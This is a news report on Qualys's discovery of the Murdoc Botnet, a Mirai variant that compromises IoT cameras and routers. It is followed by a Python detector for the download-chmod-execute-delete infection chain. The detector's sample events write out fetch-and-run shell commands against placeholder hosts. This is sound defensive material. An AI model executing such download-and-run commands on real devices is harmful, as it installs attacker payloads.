Qualys uncovers large-scale Murdoc Botnet campaign

Targets cameras, routers and other IoT devices

Qualys has announced the discovery of a new operation within the Mirai campaign targeting IoT devices worldwide.

The Qualys Threat Research Unit has dubbed the campaign the Murdoc Botnet. This variant exploits vulnerabilities in AVTECH cameras and Huawei HG532 routers, infiltrating devices and creating extensive botnet networks.

Utilising a FOFA query, researchers identified over 1,300 active IP addresses involved in the campaign, which has been active since July 2024. More than 100 servers have been associated with the attacks, targeting devices around the world.

While the campaign has affected companies in the UK and the US, the most impacted countries are Malaysia, Thailand, Mexico and Indonesia.

The Murdoc Botnet leverages vulnerabilities to install malicious payloads on devices such as IP cameras, routers and other IoT systems. The botnet gains control by executing shell scripts and ELF files, enabling attackers to conduct DDoS attacks and distribute malware.

The campaign follows an established infection flow: a shell script is downloaded to the device, given execute permission and run to deploy the payload, which is then deleted to maintain stealth.

The research team identified over 500 malware samples, each employing variations of the same mechanism. The payloads, often embedded in bash scripts, specifically target vulnerable devices, including AVTECH cameras and TP-Link routers.

The researchers uncovered more than 100 command-and-control servers facilitating malware distribution. These servers communicate with compromised devices, ensuring the botnet’s propagation and operation.

To mitigate the risks posed by the Murdoc Botnet, Qualys advises monitoring processes and network activity for anomalies, avoiding the execution of scripts from untrusted sources and keeping devices and firmware updated with the latest security patches.
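As an added example, not taken from the Qualys report, the following detector applies the process-monitoring advice to the infection flow described above: it walks constructed process-execution events (host, command line) and alerts when a downloaded file is made executable and run, optionally followed by its deletion. The hostnames, paths and URLs are constructed sample values.

```python
import re

# Constructed sample events (host, command line); not real samples from the report.
SAMPLE_EVENTS = [
    ("cam-01", "wget http://198.51.100.7/x.sh -O /tmp/x.sh"),
    ("cam-01", "chmod +x /tmp/x.sh"),
    ("cam-01", "sh /tmp/x.sh"),
    ("cam-01", "rm -f /tmp/x.sh"),
    ("rtr-02", "curl -o /var/tmp/update.sh http://example.net/u.sh"),
    ("rtr-02", "chmod 755 /var/tmp/update.sh"),
    ("rtr-02", "/var/tmp/update.sh"),
    ("ws-03", "wget https://example.org/pkg.tar.gz -O /tmp/pkg.tar.gz"),
    ("ws-03", "tar xzf /tmp/pkg.tar.gz"),           # benign: never chmod'ed or run
]

# Stages of the download -> chmod -> execute -> delete chain, in order.
STAGES = ("download", "chmod", "execute", "delete")

def classify(cmd):
    """Map a command line to (stage, file path), or None if irrelevant."""
    m = re.search(r"\b(?:wget|curl)\b.*?\s-[Oo]\s+(\S+)", cmd)
    if m:
        return "download", m.group(1)
    m = re.match(r"chmod\s+\S+\s+(\S+)", cmd)
    if m:
        return "chmod", m.group(1)
    m = re.match(r"rm\s+(?:-\S+\s+)*(\S+)", cmd)
    if m:
        return "delete", m.group(1)
    m = re.match(r"(?:(?:sh|bash)\s+)?(\S+)", cmd)  # direct or interpreter-wrapped run
    return ("execute", m.group(1)) if m else None

def progress(events):
    """Return {(host, path): furthest stage index} for every downloaded file."""
    reached = {}
    for host, cmd in events:
        c = classify(cmd)
        if c is None:
            continue
        stage, path = c
        idx, key = STAGES.index(stage), (host, path)
        if stage == "download":
            reached[key] = 0                 # start tracking a fresh download
        elif reached.get(key) == idx - 1:
            reached[key] = idx               # strict in-order progression only
    return reached

def alerts(events):
    """Alert on downloads that were made executable and run; deletion is optional."""
    return sorted((h, p, STAGES[i]) for (h, p), i in progress(events).items()
                  if i >= STAGES.index("execute"))

if __name__ == "__main__":
    for host, path, stage in alerts(SAMPLE_EVENTS):
        print(f"{host}: {path} reached stage '{stage}'")
```

On real telemetry the events would come from an audit or EDR process log; the interesting signal is the ordered chain on one host, not any single command.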